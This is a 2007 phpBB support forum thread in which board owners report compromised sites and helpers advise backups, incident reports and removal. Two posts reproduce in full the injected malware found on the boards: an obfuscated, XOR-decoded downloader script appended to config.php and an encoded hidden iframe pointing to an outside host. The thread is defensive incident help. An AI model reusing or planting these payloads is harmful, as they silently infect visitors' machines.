Page 1 of 2

Board Hacked into

Posted: Sun Oct 14, 2007 1:41 pm
by BWOL
Help!

My board has been hacked into. Link removed--cybrid23
Could someone help me with what to do to fix it.

Thank you!

Re: Board Hacked into

Posted: Sun Oct 14, 2007 1:47 pm
by jwunderly
post the contents of your config.php file between code tags, but remove the password.

Re: Board Hacked into

Posted: Sun Oct 14, 2007 3:45 pm
by cybrid23
My board has been hacked, what do I do?

Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.

Re: Board Hacked into

Posted: Sun Oct 14, 2007 5:04 pm
by nvic
Just to alert fellow forumers, my mcafee said this when I visited that site:
Mcafee AV wrote: McAfee has automatically blocked and removed a potentially harmful script.

Details
Detection: JS/Downloader-AUD (Virus)
It is serving an infection. Make sure your AV is up to date before you visit the link!

Re: Board Hacked into

Posted: Sun Oct 14, 2007 5:46 pm
by BWOL
Sorry about the link - my oversite - I meant to post a warning about it.
jwunderly wrote:post the contents of your config.php file between code tags, but remove the password.
This is what is in the config.php file:

Code: Select all

<?php


// phpBB 2.x auto-generated config file
// Do not change anything in this file!

$dbms = 'mysql4';

$dbhost = 'localhost';
$dbname = 'bodywork_phpbb';
$dbuser = 'bodywork_phpbb';
$dbpasswd = '*********';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);

?>
									<!--[I]--><script>document.write(unescape("%3Cscript%3Eif%28hbm%21%3D1%29%7Bfunction%20Wa%28fW%29%7Breturn%20fW%7Dtry%7Bvar%20dzm%3D%27oo0o50oJ0oj0oF0oM0oZ0oG0o40o60oR0oz0oy0ob0ox0oU0oB0od0oq0oK0oS0om0ow0o90oc0ol0oV0oW0oO0os0oh0on0oT0o30of0oX0ot0og0oP0o70oa0oY0oD0oN0oe0or0oA0oH0oL0op0o80oC0oi0ok05o05505J05j05F05M05Z05G05405605R05z05y05b05x05U05B05d05q05K05S05m05w05905c%27%3Bvar%20cQD%3Ddzm.substr%282%2C1%29%2Czje%3DArray%28sYq%28%2768%27%29%2CsYq%28%2711%27%29%2CsYq%28%2727%27%29%2C29845%5E29855%2C28380%5E28365%2C26007%5E26015%2C24187%5E24183%2CsYq%28%2770%27%29%2C28523%5E28533%2CsYq%28%2713%27%29%2C509%5E491%2C28908%5E28923%2C2399%5E2311%2CsYq%28%2754%27%29%2C28570%5E28581%2CsYq%28%2780%27%29%2CsYq%28%2749%27%29%2CsYq%28%2784%27%29%2CsYq%28%2746%27%29%2C9880%5E9929%2CsYq%28%273%27%29%2CsYq%28%2714%27%29%2C19430%5E19455%2C13030%5E13031%2CsYq%28%2726%27%29%2CsYq%28%2720%27%29%2C3464%5E3533%2C20244%5E20233%2C13700%5E13707%2CsYq%28%2760%27%29%2C21443%5E21497%2CsYq%28%2767%27%29%2C32227%5E32181%2CsYq%28%2744%27%29%2CsYq%28%2721%27%29%2C1386%5E1397%2C1996%5E1951%2C8719%5E8783%2C16273%5E16351%2CsYq%28%2776%27%29%2C28457%5E28513%2C17005%5E17009%2C17032%5E17051%2CsYq%28%2790%27%29%2C5009%5E5009%2CsYq%28%2753%27%29%2C24918%5E24957%2C4692%5E4689%2C8007%5E8039%2CsYq%28%2795%27%29%2CsYq%28%2773%27%29%2C6933%5E6935%2CsYq%28%2742%27%29%2CsYq%28%2747%27%29%2C4159%5E4107%2C18276%5E18259%2CsYq%28%2734%27%29%2C15412%5E15459%2C22199%5E22183%2C30808%5E30733%2CsYq%28%2766%27%29%2C9114%5E9155%2C25284%5E25219%2CsYq%28%2751%27%29%2C12086%5E12053%2C23901%5E23931%2CsYq%28%2765%27%29%2C12130%5E12103%2C14301%5E14329%2CsYq%28%2761%27%29%2C1110%5E1135%2C21282%5E21273%2C29531%5E29481%2CsYq%28%2774%27%29%2C13452%5E13511%2CsYq%28%2777%27%29%2C14074%5E14005%2CsYq%28%2740%27%29%2CsYq%28%2782%27%29%29%3Bvar%20uZj%2ChVJ%3Bvar%20Xam%2CCQy%3D%27ooo5oJojoFoMoZoGo4o6oRoJoZoFozoRoyoboxo4oUoJoBojodoqoRoboKoSoyomowojoyo9ocoloVoRoWoOoyosowoZoWoUoKodoyoho6oloVoyoRoWoOoyosowoZoWoUoKonoyoho6oloTo5oWoZo3oFofoWoUo9ocoloToXoWoZo3oFofoWoUoKotogoPo7oaoaoaoaoaoKonoyoYozoJo6ofoWoRoZoToJozozoDoFoWoyoVoyoJoBojotoNoVoNotoWo5oJowoMoWoUoqoRoboKotoNonoWoeoMoFojoWo5oVoNotoho6oloToZozoxoro3oAoZojoFoRoXoUoKonoyoHomowojoyoroLocoVopo5o8o4oqoCoioponomowojoyokolo5oVopo8opod5o55owoVopo6oMoYowoZoWo8oToJolowo5o5oFoJoZoWoloTozojoXoponomowojoyoz5Jo6oVop5j5FoZofol5joponoFo4oUoYozoJo6ofoWoRoZoToJozozoDoFoWoToFoRoYoWoe55o4oUoroLocotopoVopotokolo5oKoyoVoV5Mo8oKoSomowojoyoYol5FoVoYozoJo6ofoWoRoZoTolozoJowoZoFozoRoT5Fozo5oZonomowojoyoRoBoZoVoyop5FoZopotopoZoM5Zopotop5j5jopotoUoyoYol5Foy5GoVoyopop54opop5ZoJoM56oUoKoKoyotoyoYol5FoTojoWoMolowoJoWoyoU5j5R5zow5MoCoa5M5yoT5M5b5jodopoTopoKoTojoWoMolowoJoWoyoU5j5xoTot5jodopoTopoKotopoTopotoJoM56oUoKoyotopoTopoyotoy5o55owotoz5Jo6onomowojoyoXo5oZoVoYozoJo6ofoWoRoZoToJojoWowoZoW5UoloWofoWoRoZoUopoFo4ojowofoWopoKonoXo5oZoTo5oWoZ5BoZoZojoFoco6oZoWoyoUopo5ojoJopodoyoRoBoZoKonoXo5oZoT5FoWoFoX5FoZoVoaonoXo5oZoToOoFoYoZ5FoVo8onoXo5oZoTo4ojowofoWohozojoYoWojoyoVoyoaonoyoZojo9oSoyoYozoJo6ofoWoRoZoTocozoYo9oTowoMoMoWoRoY5d5FoFoloYoyoUoyoXo5oZoKonoyoboxo4oUoroLocodoyokolo5oyoKonoHoyoJowoZoJ5FoUoWoKoyoSoYozoJo6ofoWoRoZoToOojoFoZoWoyoUopoo5FoZofoloGooocozoYo9oGoo5jocozoYo9oGoo5j5FoZofoloGopoKonoyoYozoJo6ofoWoRoZoTocozoYo9oTowoMoMoWoRoY5d5FoFoloYoyoUoyoXo5oZoKonoboxo4oyoUoyoroLocodokolo5oKoyonoHoyoH5qo4o6oRoJoZoFozoRoyoJoM56oUoKoSoyomowojoy5J5dosoV5Ko7onomowojoyo6oX5JoVoNoao85K5So75moP5wog5yoaowocoJoYoWo4oNodorojoYoVoNoNonoyo4ozojoU595J5ooVoaonoy595J5ooyoooy5J5dosonoy595J5oototoKoyorojoYotoVoyo6oX5JoTo5o6oco5oZojoUorowoZ5FoTo4olozozojoUorowoZ5FoTojowoRoYozofoUoK5co6oX5JoToloWoRoXoZ5FoKodo8odo8oKonoyojoWoZo6ojoRoyorojoYonoyoHoo5jo5oJojoFoMoZoG%27%3Bvar%20uTk%3DString%28%29%3Bfunction%20sYq%28IaK%29%7Breturn%20parseInt%28IaK%29%7Ddzm%3Ddzm.split%28cQD%29%3Bfor%20%28uZj%3D0%3BuZj%3CCQy.length%3BuZj+%3D2%29%7BXam%3DCQy.substr%28uZj%2C2%29%3Bfor%28hVJ%3D0%3BhVJ%3Cdzm.length%3BhVJ++%29%7Bif%28dzm%5BhVJ%5D%3D%3DXam%29break%3B%7DuTk+%3DString.fromCharCode%28zje%5BhVJ%5D%5E120%29%3B%7Ddocument.write%28uTk%29%3B%7Dcatch%28MVs%29%7B%7D%7Dvar%20hbm%3D1%3C/script%3E"))</script><!--[/I]-->
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
I don't have enough knowledge to know what these steps entail. I have a full backup I made just days prior to this all starting. I am trying to contact the webmaster, but that is proving to be difficult.

Thank you.

Re: Board Hacked into

Posted: Sun Oct 14, 2007 5:52 pm
by cybrid23
Download the files to your PC using an ftp client

Backup the database

If you can get the server logs, that helps.

Then file a report and either attach the files or upload them to a site where they can be accessed.

To fix this, remove the script line at the end of the config.php file (after doing the above please)

Re: Board Hacked into

Posted: Sun Oct 14, 2007 6:26 pm
by BWOL
Thank you.

I am backing up the database right now. I will look into everything else and see what I can find and then file the report.

Re: Board Hacked into

Posted: Sun Oct 14, 2007 6:49 pm
by cybrid23
Okay.

Also check your site for any files you don't recognize as putting there.

Make your host aware of it so they can check the server as they may have gotten in that way

Re: Board Hacked into

Posted: Mon Oct 15, 2007 12:19 am
by BWOL
Thank you for your help. The webmaster did end up stepping in and it seems all is well now. I think I still have enough of the information to file an incident report - should I still do that?

Re: Board Hacked into

Posted: Mon Oct 15, 2007 12:21 am
by cybrid23
Yes.

Re: Board Hacked into

Posted: Mon Oct 15, 2007 12:49 am
by BWOL
Will do.

I am getting this message on the log in when trying to get into the Cpanel:
The server (our board) at cPanel requires a username and password.

Warning: This server is requesting that your username and password be
sent in an insecure manner (basic authentication without a secure
connection).
Do you know what that is about? I was able to get in earlier today.

Re: Board Hacked into

Posted: Mon Oct 15, 2007 1:09 am
by cybrid23
Cpanel is provided by your host, not phpBB.

You need to ask them.

Re: Board Hacked into

Posted: Fri Oct 19, 2007 2:26 pm
by crag364
Hi,

I have the exact same virus appeared on my board! I have checked the config file but no script is at the end of mine. Anyone know what I can do? When I check the index source I see this:

Code: Select all

<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%6F%75%6E%74%65%72%2D%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
I expect thats the virus.

I have already reported this to my webhost, anyone know what I can do?

Thanks,

Craig

Re: Board Hacked into

Posted: Fri Oct 19, 2007 2:32 pm
by stevemaury
What is "the index source"? index.php? If so, upload a fresh copy, file an incident report here as per the above, and report it to your host.

Re: Board Hacked into

Posted: Fri Oct 19, 2007 2:43 pm
by crag364
Sorry I meant my config file, I have replaced this with a backup and its still coming up. My config file is posted below:

Code: Select all

<?php

    $dbms = 'mysql' ;

    $dbhost   = 'localhost' ;
    $dbname   = 'underwat_phpb1'   ;
    $dbuser   = 'underwat_phpb1' ;
    $dbpasswd = '***' ;

    $table_prefix = 'phpbb_' ;

    define ( 'PHPBB_INSTALLED' , TRUE ) ;

?>
It all looks ok to me.

I did find one trace of it in the viewforum file yesterday, I deleted this and uploaded a backup and its not in there now either but still appearing.